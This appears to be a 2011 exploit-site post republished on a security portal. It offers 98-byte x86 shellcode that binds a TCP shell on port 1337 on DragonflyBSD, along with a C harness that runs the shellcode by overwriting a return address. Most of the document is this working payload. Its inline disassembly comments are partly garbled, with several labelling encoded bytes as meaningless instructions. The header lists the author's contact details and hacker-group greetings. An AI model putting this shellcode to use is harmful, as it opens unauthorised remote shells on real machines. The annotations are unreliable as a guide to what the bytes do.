DragonflyBSD PortBind TCP (1337) Shellcode

		当前位置：主页>安全文章>文章资料>Exploits>文章内容
DragonflyBSD PortBind TCP (1337) Shellcode - 98 bytes
来源：http://facebook.com/KedAns 作者：KedAns-Dz 发布时间：2011-09-05
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm KedAns-Dz member from Inj3ct0r Team                1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
/*
###
# Title : DragonflyBSD PortBind TCP (1337) Shellcode - 98 bytes
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com | kedans@facebook.com
# Home : Hassi.Messaoud (30008) - Algeria -(00213555248701)
# Web Site : www.1337day.com * www.exploit-id.com * sec4ever.com
# Facebook : http://facebook.com/KedAns
# platform : bsd/x86
# Impact : PortBind TCP (1337)
# Tested on : DragonflyBSD v2.10.1 (REL)
##
# [Indoushka & SeeMe & L0rd CrusAd3r] => Welcome back Br0ther's <3 ^^ <3
##
# | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << |
# | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3   |
# | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * H-KinG |
# | ------------------------------------------------- < |
###
*/
/*....:::| Saha 3idK0um ; Aid MoUbarak to All MusLim's |:::....*/

#include <stdio.h>
#include <string.h>
/*
* DragonflyBSD PortBind TCP (1337) Shellcode - 98 bytes
* Tested on DragonflyBSD v2.10.1 (Default Target : 192.168.1.2)
* Should working on FreeBSD and OpenBSD (^_^) . 
*/
char shellcode[]=
"\x6a\x13".         // push $0x13
"\x59".             // pop %ecx
"\xD9\xee".         // fldz
"\xd9\x74\x24\xf4". // fstenv %esp
"\x5b".             // pop %ebx
"\x81\x73\x13\x18\x88\x4a". // xor dword %ebx $0x13,$0x4a8818
"\x83\xeb\xfc".     // sub %ebx
"\xe2\xf4".         // loopd short
"\x29\x48\x1a".     // sub dword %eax $0x1a,%ecx
"\xb6\xe7".         // mov %dh,$0xe7
"\x8a\x4f\xe7".     // mov %cl,%edi
"\x91".             // xchg %eax,%ecx
"\x6f".             // outs %dx,dword %edi
"\x1a\xb4\x19\xe2\x48\xb4". // sbb %dh,%ecx %ebx ,$0xb448e2
"\x38\x2b".         // cmp %ebx,%ch
"\x13\x98\xdf\x1a\x8e\x72". // adc %ebx,dword %eax $0x728e1adf
"\xE0\x12".         // loopdne short
"\x13\x98\x01\x0D\x32\xa8".  // adc %ebx,dword %eax $0xa8320d01
"\xe2\x87".         // loopd short
"\x5e".             // pop %esi
"\xa8\x96".         // test %al, $0x96
"\x87\x5e\x48".     // xchg dword %esi $0x48,%ebx
"\xd8\x20".         // fsub dword %eax
"\x84\x40\x45".     // test %eax $0x45,%al
"\xcA\x21\x57".     // retf $0x5721 (return)
"\x6c".             // ins %edi,%dx
"\x33\x28".         // xor %ebp,dword %eax
"\x48".             // dec %eax
"\xe0\x65".         // loopdne short
"\xf1".             // int
"\x6b\xe0\x22".     // imul %esp,%eax $0x22
"\xf1".             // int
"\x7a\xe1".         // jpe short
"\x24\x57".         // adn %al,$0x57
"\xfb".             // sti
"\xd8\x1e".         // fcomp dword %esi
"\x8d\x48\x38".     // lea %ecx,dword %eax $0x38
"\x71\x13".         // jno short
"\x98".             // cwde
"\x88\x4a\xde";     // mov %edx,%cl

main()
{
   int *ret;
   printf("Shellcode lenght=%d\n",sizeof(shellcode));
   ret=(int*)&ret+2;
   (*ret)=(int)shellcode;
}

/*....:::| Saha 3idK0um ; Aid MoUbarak to All Muslim's |:::....*/

#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]=====================================
# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > + Rizky Ariestiyansyah * Islam Caddy <3
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re * CrosS (www.1337day.com) 
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * SeeMe * XroGuE * ZoRLu * gunslinger_ 
# anT!-Tr0J4n * ^Xecuti0N3r * Kalashinkov3 (www.1337day.com/team) * Dz Offenders Cr3w * Sec4ever
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X
# Kha&miX * Str0ke * JF * Ev!LsCr!pT_Dz * H-KinG * www.packetstormsecurity.org * TreX (hotturks.org)
# www.metasploit.com * UE-Team & I-BackTrack * r00tw0rm.com * All Security and Exploits Webs ..
#=================================================================================================
[